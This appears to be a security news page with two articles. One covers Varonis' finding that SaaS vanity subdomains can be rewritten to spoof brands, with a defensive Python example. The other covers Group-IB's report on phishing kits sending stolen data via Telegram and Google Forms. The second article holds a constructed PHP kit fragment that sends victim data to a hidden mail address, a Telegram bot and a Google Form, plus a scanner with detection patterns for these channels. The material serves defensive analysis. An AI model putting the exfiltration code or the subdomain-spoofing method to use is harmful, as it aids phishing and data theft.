
SaaS App Vanity URLs Can Be Spoofed for Phishing & Social Engineering


Researchers warn that vanity links made by businesses to add their brand to well-known cloud services could become a handy vector for phishing attacks and a technique to deceive users. Cloud services that don't check whether subdomains have been modified may allow URLs that appear to be from "varonis.box.com" or "apple.zoom.us," according to a Varonis advisory released on Wednesday. 

In the instance of Box.com, this could result in a malicious document; in the case of Zoom, it could result in a data-gathering webinar unrelated to the stated brand. The issue arises when a cloud service permits the usage of a vanity subdomain but does not validate it or use it to provide services. More than six months ago, Varonis warned Box.com and Zoom of the problem, as well as Google, whose URLs to Google Docs might be spoofed. 

The issues are essentially fixed, according to the company. According to Or Emanuel, director of research and security at Varonis, the same vulnerability is likely to exist at other providers. "We think it is more than just those three SaaS services," he says, adding that attackers can also use the predictability of the subdomains to select potential victims. "Because of the vanity URLs, it makes it very easy for threat actors to scan all the subdomains of all the big Fortune companies with different cloud providers." 

Attackers use the names of well-known companies to host dangerous code and phishing sites, which allows them to dupe victims into trusting false e-mail messages and website links. In 2019, for example, three-quarters of businesses found that a lookalike domain had been created by a third party using a top-level domain other than .COM. Varonis' research takes a different approach to the problem. 

Rather than looking at top-level domains, the company's researchers looked into ways to abuse the subdomains that many cloud service providers allow their customers to use. "Not only do vanity URLs feel more professional, but they also provide a sense of security for end-users," Varonis stated in the advisory. "Most people are likelier to trust a link at varonis.box.com than a generic app.box.com link. However, if someone can spoof that subdomain, then trusting the vanity URL can backfire."

When a customer is permitted to use their brand as a subdomain, such as varonis.zoom.us, a software-as-a-service (SaaS) application is vulnerable to the attack if the subdomain is not validated when the link is handed to a third party, such as participants in a conference call or webinar. In the case of Zoom's service, attackers may design a webinar that asks registrants a series of social-engineering-friendly questions, rebrand the webinar as a well-known organisation, and then rewrite the resulting URL to carry the targeted organisation's subdomain. 

The original domain, for example attacker.zoom.us, might be changed to varonis.zoom.us without breaking the link. A well-branded page might trick a victim into providing personal information, especially if the subdomain indicates that the host is a well-known organisation. In the case of Box.com, a link like app.box.com/f/abcd1234 may be modified to varonis.app.box.com/f/abcd1234 to make it look like an official form gathering information while actually sending it to the attacker.

"The more interesting attacks from a data protection standpoint are when you have forms for registration or file-sharing requests," Emanuel says. "When the threat actor controls these pages, they can ask for any information they want, and it seems totally legit. It's really hard to determine that it's not a page that the company owns." 

This type of social engineering is useful in phishing attacks, as well as in persuading people to click on links or download suspicious files. According to the FBI's annual Internet Crime Complaint Center (IC3) report, losses from cybercrime, including phishing attacks, reached approximately $7 billion in 2021. According to Emanuel, cloud providers should verify that any URL change is confirmed by the link's encoding. 
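To show the provider-side defect and the check Emanuel describes, here is an added example (not Varonis' or any provider's code) that models a file-sharing service with vanity subdomains. The registry, resource ids and the stand-in apex domain `box.example` are constructed assumptions; the vulnerable handler ignores the vanity label, while the hardened one refuses to serve a resource under a tenant label that does not own it.

```python
from urllib.parse import urlsplit

# Constructed registry: resource id -> tenant that owns it. Hypothetical data for the example.
RESOURCES = {"abcd1234": "attacker", "f00d5678": "varonis"}
SERVICE_DOMAIN = "box.example"   # stand-in for the SaaS provider's apex domain

def tenant_from_host(host):
    """Return the vanity label in host (<tenant>.app.<service>), or None for the generic app host."""
    if host == f"app.{SERVICE_DOMAIN}":
        return None
    suffix = f".app.{SERVICE_DOMAIN}"
    label = host[:-len(suffix)] if host.endswith(suffix) else ""
    if not label or "." in label:
        raise ValueError(f"host not served here: {host}")
    return label

def resource_from_path(path):
    """Map /f/<id> to a known resource id."""
    parts = path.strip("/").split("/")
    if len(parts) == 2 and parts[0] == "f" and parts[1] in RESOURCES:
        return parts[1]
    raise KeyError(f"unknown resource path: {path}")

def serve_unchecked(url):
    """Vulnerable pattern: the vanity label is used for branding but never validated,
    so attacker.app.<service>/f/abcd1234 rewritten to varonis.app.<service>/f/abcd1234
    still serves the attacker's resource, now displayed under the spoofed brand."""
    u = urlsplit(url)
    label = tenant_from_host(u.hostname)
    owner = RESOURCES[resource_from_path(u.path)]
    return {"branded_as": label or owner, "owner": owner}

def serve_checked(url):
    """Hardened pattern: a vanity label must match the tenant that owns the resource."""
    u = urlsplit(url)
    label = tenant_from_host(u.hostname)
    rid = resource_from_path(u.path)
    owner = RESOURCES[rid]
    if label is not None and label != owner:
        raise PermissionError(f"resource {rid} is not owned by tenant {label}")
    return {"branded_as": owner, "owner": owner}

if __name__ == "__main__":
    spoofed = "https://varonis.app.box.example/f/abcd1234"
    print("unchecked:", serve_unchecked(spoofed))
    try:
        serve_checked(spoofed)
    except PermissionError as e:
        print("checked:", e)
```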

According to Varonis, both Box.com and Google have fixed the issues, although the errors are still present for Google Forms and Google Docs when using the "Publish to the web" function. Zoom now notifies users when the subdomain is changed. Furthermore, users should be wary of links, particularly if the linked page asks for too much information or leads to further links or files. 

"We recommend educating your coworkers about the risk associated with clicking on such links and especially submitting PII and other sensitive information via forms, even if they appear to be hosted by your company’s sanctioned SaaS accounts," Varonis stated in the advisory.

Threat Actors are Using Telegram & Google Forms to Obtain Stolen User Data


Security researchers have noted an increase in the misuse of legitimate services such as Google Forms and Telegram for gathering user data stolen on phishing websites. Email remains the most popular method among threat actors for exfiltrating stolen data, but these methods foreshadow a new trend in the evolution of phishing kits.

After analyzing the phishing kits over the past year, researchers at cybersecurity company Group-IB observed that more of these tools permit collecting users' stolen data using Google Forms and Telegram. 

What is a phishing kit? 

A phishing kit is a toolset that helps design and run phishing web pages mimicking a particular brand or firm, or even several at once. Phishing kits are often sold to hackers who lack strong coding skills, allowing them to build the infrastructure for large-scale phishing campaigns.

By extracting the phishing kit, security researchers can examine the methodology used to carry out the phishing attack and figure out where the stolen data is sent. In addition, a thorough examination of the phishing kit helps researchers detect digital footprints that might lead to the developers of the phishing kit.

Latest trends of 2020 

Security researchers at Group-IB identified more than 260 unique brands that were targeted by cybercriminals, most of them being online services (30.7%: online tools to view documents, online shopping, streaming services, and more), email clients (22.8%), and financial organizations (20%). The most exploited brands of 2020 were Microsoft, PayPal, Google, and Yahoo.

Another trend the researchers noticed was that the developers of phishing kits were double-dipping to increase their profits by adding code that copies the stream of stolen data to a host they control. Security researchers explained that one method is to configure the 'send' function to deliver the information both to the email address provided by the buyer of the phishing kit and to the 'token' variable, which is linked to a concealed email address.
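An added example of the kit analysis the article describes (not Group-IB's tooling): a small scanner that runs over a constructed fragment of a kit's "send" handler and reports every exfiltration channel it finds, decoding base64 literals so a concealed recipient behind a 'token'-style variable becomes visible. The fragment, the regular expressions and the channel names are assumptions made for this example.

```python
import base64
import re

# Constructed fragment of a phishing-kit "send" handler (not real kit code), showing a
# buyer-configured recipient beside concealed channels of the kind the article describes.
KIT_SOURCE = r'''
<?php
$to = "buyer@example.invalid";                               // set by the kit buyer
$token = base64_decode("aGlkZGVuQGV4YW1wbGUuaW52YWxpZA==");  // hidden kit-author address
mail($to, "Result", $message);
mail($token, "Result", $message);
$tg = "https://api.telegram.org/bot000000:EXAMPLE/sendMessage?chat_id=1&text=" . urlencode($message);
$gf = "https://docs.google.com/forms/d/e/EXAMPLEFORMID/formResponse";
?>
'''

# Analyst-side patterns (assumed for this example) for the channels the article names.
PATTERNS = {
    "email": re.compile(r'\bmail\(\s*(\$\w+|"[^"]+")'),
    "telegram": re.compile(r'https?://api\.telegram\.org/bot[^/\s"\']+/\w+'),
    "google_form": re.compile(r'https?://docs\.google\.com/forms/[^\s"\']+formResponse'),
    "base64": re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"'),
}

def find_exfil_channels(src):
    """Return channel -> list of sightings, with base64 literals decoded for the analyst."""
    found = {name: pat.findall(src) for name, pat in PATTERNS.items()}
    decoded = []
    for blob in found["base64"]:
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            decoded.append("<undecodable>")
    found["base64_decoded"] = decoded
    return found

def is_double_dipping(src):
    """True when stolen data goes to more than one mail recipient or more than one channel."""
    f = find_exfil_channels(src)
    recipients = len(set(f["email"]))
    channels = (1 if recipients else 0) + sum(1 for k in ("telegram", "google_form") if f[k])
    return recipients > 1 or channels > 1

if __name__ == "__main__":
    for channel, hits in find_exfil_channels(KIT_SOURCE).items():
        print(f"{channel:15} {hits}")
    print("double-dipping:", is_double_dipping(KIT_SOURCE))
```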

"Phishing kits have changed the rules of the game in this segment of the fight against cybercrime. In the past, cybercriminals stopped their campaigns after the fraudulent resources had been blocked and quickly switched to other brands. Today, they automate their attacks and instantly replace the blocked phishing websites with new web pages," Yaroslav Kargalev, Deputy Head at CIRT-GIB, stated.